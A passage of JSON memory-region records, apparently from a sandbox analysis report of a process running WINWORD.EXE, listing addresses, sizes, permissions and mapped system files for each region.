"norm_filename": null, "region_type": "private_memory", "start_va": 10354688, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 10420224, "type": "region", "version": 1 }, "end_va": 10424319, "entry_point": 0, "filename": null, "id": "region_183", "name": "pagefile_0x00000000009f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 10420224, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 10485760, "type": "region", "version": 1 }, "end_va": 10551295, "entry_point": 0, "filename": null, "id": "region_184", "name": "private_0x0000000000a00000", "norm_filename": null, "region_type": "private_memory", "start_va": 10485760, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 10551296, "type": "region", "version": 1 }, "end_va": 10567679, "entry_point": 0, "filename": null, "id": "region_185", "name": "pagefile_0x0000000000a10000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 10551296, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 10616832, "type": "region", "version": 1 }, "end_va": 10620927, "entry_point": 0, "filename": null, "id": "region_186", "name": "private_0x0000000000a20000", "norm_filename": null, "region_type": "private_memory", "start_va": 10616832, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 10682368, "type": "region", "version": 1 }, "end_va": 10686463, "entry_point": 0, "filename": null, "id": "region_187", "name": "private_0x0000000000a30000", "norm_filename": null, "region_type": "private_memory", "start_va": 10682368, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 262144, "start_va": 10747904, "type": "region", "version": 1 }, "end_va": 11010047, "entry_point": 0, "filename": null, "id": "region_188", "name": "private_0x0000000000a40000", "norm_filename": null, "region_type": "private_memory", "start_va": 10747904, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 11010048, "type": "region", "version": 1 }, "end_va": 11018239, "entry_point": 0, "filename": null, "id": "region_189", "name": "pagefile_0x0000000000a80000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 11010048, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 11075584, "type": "region", "version": 1 }, "end_va": 11337727, "entry_point": 0, "filename": null, "id": "region_190", "name": "private_0x0000000000a90000", "norm_filename": null, "region_type": "private_memory", "start_va": 11075584, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 11337728, "type": "region", "version": 1 }, "end_va": 11341823, "entry_point": 0, "filename": null, "id": "region_191", "name": "pagefile_0x0000000000ad0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 11337728, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 11403264, "type": "region", "version": 1 }, "end_va": 11407359, "entry_point": 0, "filename": null, "id": "region_192", "name": "pagefile_0x0000000000ae0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 11403264, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 11468800, "type": "region", "version": 1 }, "end_va": 11472895, "entry_point": 11468800, "filename": "\\Windows\\System32\\msxml6r.dll", "id": "region_193", "name": "msxml6r.dll", "norm_filename": "c:\\windows\\system32\\msxml6r.dll", "region_type": "memory_mapped_file", "start_va": 11468800, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 155648, "start_va": 11534336, "type": "region", "version": 1 }, "end_va": 11689983, "entry_point": 11534336, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000015.db", "id": "region_194", "name": "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db", "region_type": "memory_mapped_file", "start_va": 11534336, "timestamp": "00:00:11.659", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 11730944, "type": "region", "version": 1 }, "end_va": 11735039, "entry_point": 0, "filename": null, "id": "region_195", "name": "pagefile_0x0000000000b30000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 11730944, "timestamp": "00:00:11.659", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 262144, "start_va": 11796480, "type": "region", "version": 1 }, "end_va": 12058623, "entry_point": 0, "filename": null, "id": "region_196", "name": "private_0x0000000000b40000", "norm_filename": null, "region_type": "private_memory", "start_va": 11796480, "timestamp": "00:00:11.659", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 69632, "start_va": 12058624, "type": "region", "version": 1 }, "end_va": 12128255, "entry_point": 12058624, "filename": "\\Windows\\System32\\C_1255.NLS", "id": "region_197", "name": "c_1255.nls", "norm_filename": "c:\\windows\\system32\\c_1255.nls", "region_type": "memory_mapped_file", "start_va": 12058624, "timestamp": "00:00:11.659", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 12189696, "type": "region", "version": 1 }, "end_va": 13238271, "entry_point": 0, "filename": null, "id": "region_198", "name": "private_0x0000000000ba0000", "norm_filename": null, "region_type": "private_memory", "start_va": 12189696, "timestamp": "00:00:11.659", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 13238272, "type": "region", "version": 1 }, "end_va": 17379327, "entry_point": 0, "filename": null, "id": "region_199", "name": "pagefile_0x0000000000ca0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 13238272, "timestamp": "00:00:11.660", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 17432576, "type": "region", "version": 1 }, "end_va": 17436671, "entry_point": 0, "filename": null, "id": "region_200", "name": "private_0x00000000010a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 17432576, "timestamp": "00:00:11.660", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 17498112, "type": "region", "version": 1 }, "end_va": 17502207, "entry_point": 0, "filename": null, "id": "region_201", "name": "private_0x00000000010b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 17498112, "timestamp": "00:00:11.660", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 17563648, "type": "region", "version": 1 }, "end_va": 17567743, "entry_point": 0, "filename": null, "id": "region_202", "name": "private_0x00000000010c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 17563648, "timestamp": "00:00:11.660", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 126976, "start_va": 17629184, "type": "region", "version": 1 }, "end_va": 17756159, "entry_point": 0, "filename": null, "id": "region_203", "name": "private_0x00000000010d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 17629184, "timestamp": "00:00:11.660", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 17760256, "type": "region", "version": 1 }, "end_va": 17764351, "entry_point": 0, "filename": null, "id": "region_204", "name": "private_0x00000000010f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 17760256, "timestamp": "00:00:11.660", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 17825792, "type": "region", "version": 1 }, "end_va": 17829887, "entry_point": 0, "filename": null, "id": "region_205", "name": "private_0x0000000001100000", "norm_filename": null, "region_type": "private_memory", "start_va": 17825792, "timestamp": "00:00:11.660", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 17891328, "type": "region", "version": 1 }, "end_va": 17956863, "entry_point": 0, "filename": null, "id": "region_206", "name": "private_0x0000000001110000", "norm_filename": null, "region_type": "private_memory", "start_va": 17891328, "timestamp": "00:00:11.660", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 17956864, "type": "region", "version": 1 }, "end_va": 18481151, "entry_point": 0, "filename": null, "id": "region_207", "name": "private_0x0000000001120000", "norm_filename": null, "region_type": "private_memory", "start_va": 17956864, "timestamp": "00:00:11.660", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 18481152, "type": "region", "version": 1 }, "end_va": 18485247, "entry_point": 0, "filename": null, "id": "region_208", "name": "private_0x00000000011a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 18481152, "timestamp": "00:00:11.660", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 18546688, "type": "region", "version": 1 }, "end_va": 18550783, "entry_point": 0, "filename": null, "id": "region_209", "name": "private_0x00000000011b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 18546688, "timestamp": "00:00:11.660", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 18612224, "type": "region", "version": 1 }, "end_va": 19660799, "entry_point": 0, "filename": null, "id": "region_210", "name": "private_0x00000000011c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 18612224, "timestamp": "00:00:11.660", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 19660800, "type": "region", "version": 1 }, "end_va": 19664895, "entry_point": 0, "filename": null, "id": "region_211", "name": "private_0x00000000012c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 19660800, "timestamp": "00:00:11.660", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 19726336, "type": "region", "version": 1 }, "end_va": 19730431, "entry_point": 0, "filename": null, "id": "region_212", "name": "private_0x00000000012d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 19726336, "timestamp": "00:00:11.660", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 19791872, "type": "region", "version": 1 }, "end_va": 19795967, "entry_point": 0, "filename": null, "id": "region_213", "name": "private_0x00000000012e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 19791872, "timestamp": "00:00:11.660", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 19857408, "type": "region", "version": 1 }, "end_va": 19861503, "entry_point": 0, "filename": null, "id": "region_214", "name": "private_0x00000000012f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 19857408, "timestamp": "00:00:11.660", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1929216, "start_va": 19922944, "type": "region", "version": 1 }, "end_va": 21852159, "entry_point": 19922944, "filename": "\\Program Files\\Microsoft Office\\Office15\\WINWORD.EXE", "id": "region_215", "name": "winword.exe", "norm_filename": "c:\\program files\\microsoft office\\office15\\winword.exe", "region_type": "memory_mapped_file", "start_va": 19922944, "timestamp": "00:00:11.660", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 21889024, "type": "region", "version": 1 }, "end_va": 34471935, "entry_point": 0, "filename": null, "id": "region_216", "name": "pagefile_0x00000000014e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 21889024, "timestamp": "00:00:11.667", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 34471936, "type": "region", "version": 1 }, "end_va": 37416959, "entry_point": 34471936, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_217", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 34471936, "timestamp": "00:00:11.667", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 37421056, "type": "region", "version": 1 }, "end_va": 37425151, "entry_point": 0, "filename": null, "id": "region_218", "name": "private_0x00000000023b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 37421056, "timestamp": "00:00:11.668", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 37486592, "type": "region", "version": 1 }, "end_va": 37490687, "entry_point": 0, "filename": null, "id": "region_219", "name": "private_0x00000000023c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 37486592, "timestamp": "00:00:11.668", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 37552128, "type": "region", "version": 1 }, "end_va": 37556223, "entry_point": 0, "filename": null, "id": "region_220", "name": "private_0x00000000023d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 37552128, "timestamp": "00:00:11.668", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 37617664, "type": "region", "version": 1 }, "end_va": 37621759, "entry_point": 0, "filename": null, "id": "region_221", "name": "private_0x00000000023e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 37617664, "timestamp": "00:00:11.668", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 37683200, "type": "region", "version": 1 }, "end_va": 37687295, "entry_point": 0, "filename": null, "id": "region_222", "name": "private_0x00000000023f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 37683200, "timestamp": "00:00:11.668", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 37748736, "type": "region", "version": 1 }, "end_va": 37752831, "entry_point": 0, "filename": null, "id": "region_223", "name": "private_0x0000000002400000", "norm_filename": null, "region_type": "private_memory", "start_va": 37748736, "timestamp": "00:00:11.668", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 37814272, "type": "region", "version": 1 }, "end_va": 37818367, "entry_point": 0, "filename": null, "id": "region_224", "name": "private_0x0000000002410000", "norm_filename": null, "region_type": "private_memory", "start_va": 37814272, "timestamp": "00:00:11.668", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 37879808, "type": "region", "version": 1 }, "end_va": 37883903, "entry_point": 0, "filename": null, "id": "region_225", "name": "private_0x0000000002420000", "norm_filename": null, "region_type": "private_memory", "start_va": 37879808, "timestamp": "00:00:11.668", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 37945344, "type": "region", "version": 1 }, "end_va": 37949439, "entry_point": 0, "filename": null, "id": "region_226", "name": "private_0x0000000002430000", "norm_filename": null, "region_type": "private_memory", "start_va": 37945344, "timestamp": "00:00:11.668", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 38010880, "type": "region", "version": 1 }, "end_va": 38014975, "entry_point": 0, "filename": null, "id": "region_227", "name": "private_0x0000000002440000", "norm_filename": null, "region_type": "private_memory", "start_va": 38010880, "timestamp": "00:00:11.668", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 38076416, "type": "region", "version": 1 }, "end_va": 38080511, "entry_point": 0, "filename": null, "id": "region_228", "name": "private_0x0000000002450000", "norm_filename": null, "region_type": "private_memory", "start_va": 38076416, "timestamp": "00:00:11.668", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 38141952, "type": "region", "version": 1 }, "end_va": 38150143, "entry_point": 0, "filename": null, "id": "region_229", "name": "pagefile_0x0000000002460000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 38141952, "timestamp": "00:00:11.668", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 38731776, "type": "region", "version": 1 }, "end_va": 39780351, "entry_point": 0, "filename": null, "id": "region_230", "name": "private_0x00000000024f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 38731776, "timestamp": "00:00:11.668", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 40108032, "type": "region", "version": 1 }, "end_va": 41156607, "entry_point": 0, "filename": null, "id": "region_231", "name": "private_0x0000000002640000", "norm_filename": null, "region_type": "private_memory", "start_va": 40108032, "timestamp": "00:00:11.668", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 41287680, "type": "region", "version": 1 }, "end_va": 41549823, "entry_point": 0, "filename": null, "id": "region_232", "name": "private_0x0000000002760000", "norm_filename": null, "region_type": "private_memory", "start_va": 41287680, "timestamp": "00:00:11.668", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4194304, "start_va": 41549824, "type": "region", "version": 1 }, "end_va": 45744127, "entry_point": 0, "filename": null, "id": "region_233", "name": "pagefile_0x00000000027a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 41549824, "timestamp": "00:00:11.668", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 9633792, "start_va": 45744128, "type": "region", "version": 1 }, "end_va": 55377919, "entry_point": 45744128, "filename": "\\Windows\\Fonts\\StaticCache.dat", "id": "region_234", "name": "staticcache.dat", "norm_filename": "c:\\windows\\fonts\\staticcache.dat", "region_type": "memory_mapped_file", "start_va": 45744128, "timestamp": "00:00:11.668", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8388608, "start_va": 55377920, "type": "region", "version": 1 }, "end_va": 63766527, "entry_point": 0, "filename": null, "id": "region_235", "name": "pagefile_0x00000000034d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 55377920, "timestamp": "00:00:11.668", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 64028672, "type": "region", "version": 1 }, "end_va": 64290815, "entry_point": 0, "filename": null, "id": "region_236", "name": "private_0x0000000003d10000", "norm_filename": null, "region_type": "private_memory", "start_va": 64028672, "timestamp": "00:00:11.668", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 64684032, "type": "region", "version": 1 }, "end_va": 64749567, "entry_point": 0, "filename": null, "id": "region_237", "name": "private_0x0000000003db0000", "norm_filename": null, "region_type": "private_memory", "start_va": 64684032, "timestamp": "00:00:11.668", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 64815104, "type": "region", "version": 1 }, "end_va": 65863679, "entry_point": 0, "filename": null, "id": "region_238", "name": "private_0x0000000003dd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 64815104, "timestamp": "00:00:11.668", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 520192, "start_va": 65863680, "type": "region", "version": 1 }, "end_va": 66383871, "entry_point": 65863680, "filename": "\\Windows\\Fonts\\segoeui.ttf", "id": "region_239", "name": "segoeui.ttf", "norm_filename": "c:\\windows\\fonts\\segoeui.ttf", "region_type": "memory_mapped_file", "start_va": 65863680, "timestamp": "00:00:11.668", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 66584576, "type": "region", "version": 1 }, "end_va": 67633151, "entry_point": 0, "filename": null, "id": "region_240", "name": "private_0x0000000003f80000", "norm_filename": null, "region_type": "private_memory", "start_va": 66584576, "timestamp": "00:00:11.669", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 67633152, "type": "region", "version": 1 }, "end_va": 68419583, "entry_point": 67633152, "filename": "\\Windows\\System32\\en-US\\KernelBase.dll.mui", "id": "region_241", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\system32\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 67633152, "timestamp": "00:00:11.669", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 68419584, "type": "region", "version": 1 }, "end_va": 69468159, "entry_point": 0, "filename": null, "id": "region_242", "name": "private_0x0000000004140000", "norm_filename": null, "region_type": "private_memory", "start_va": 68419584, "timestamp": "00:00:11.675", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 69468160, "type": "region", "version": 1 }, "end_va": 70516735, "entry_point": 0, "filename": null, "id": "region_243", "name": "private_0x0000000004240000", "norm_filename": null, "region_type": "private_memory", "start_va": 69468160, "timestamp": "00:00:11.675", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 70516736, "type": "region", "version": 1 }, "end_va": 71565311, "entry_point": 0, "filename": null, "id": "region_244", "name": "private_0x0000000004340000", "norm_filename": null, "region_type": "private_memory", "start_va": 70516736, "timestamp": "00:00:11.675", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 71565312, "type": "region", "version": 1 }, "end_va": 72613887, "entry_point": 0, "filename": null, "id": "region_245", "name": "private_0x0000000004440000", "norm_filename": null, "region_type": "private_memory", "start_va": 71565312, "timestamp": "00:00:11.675", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 72744960, "type": "region", "version": 1 }, "end_va": 73793535, "entry_point": 0, "filename": null, "id": "region_246", "name": "private_0x0000000004560000", "norm_filename": null, "region_type": "private_memory", "start_va": 72744960, "timestamp": "00:00:11.675", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4194304, "start_va": 73793536, "type": "region", "version": 1 }, "end_va": 77987839, "entry_point": 0, "filename": null, "id": "region_247", "name": "pagefile_0x0000000004660000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 73793536, "timestamp": "00:00:11.675", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 409600, "start_va": 77987840, "type": "region", "version": 1 }, "end_va": 78397439, "entry_point": 77987840, "filename": "\\Windows\\Fonts\\seguisb.ttf", "id": "region_248", "name": "seguisb.ttf", "norm_filename": "c:\\windows\\fonts\\seguisb.ttf", "region_type": "memory_mapped_file", "start_va": 77987840, "timestamp": "00:00:11.675", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 78708736, "type": "region", "version": 1 }, "end_va": 78970879, "entry_point": 0, "filename": null, "id": "region_249", "name": "private_0x0000000004b10000", "norm_filename": null, "region_type": "private_memory", "start_va": 78708736, "timestamp": "00:00:11.675", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 80936960, "type": "region", "version": 1 }, "end_va": 81199103, "entry_point": 